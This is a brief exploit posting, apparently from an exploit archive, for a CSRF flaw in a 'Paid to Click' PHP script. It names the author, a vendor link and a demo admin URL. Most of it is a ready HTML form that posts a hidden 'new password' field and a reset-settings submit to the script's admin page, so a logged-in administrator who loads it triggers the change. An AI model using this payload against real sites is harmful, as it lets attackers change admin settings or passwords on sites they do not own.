# Exploit Title: Paid to Click Script CSRF # Author: Jonturk75 # Vendor or Software Link: http://www.scripts.com/viewscript/paid-to-click-script/27181/ # Category:: webapps # Demo : http://www.e-soft24.com/scripts/paid-to-click/admin/login.php <form action="target.com/[PATH]/admin/home.php" method="post"> <input type="hidden" class="inpbox" value="" name="new password"/> <input type="submit" name="reset_settings" value="Update Reset Settings" /> </form>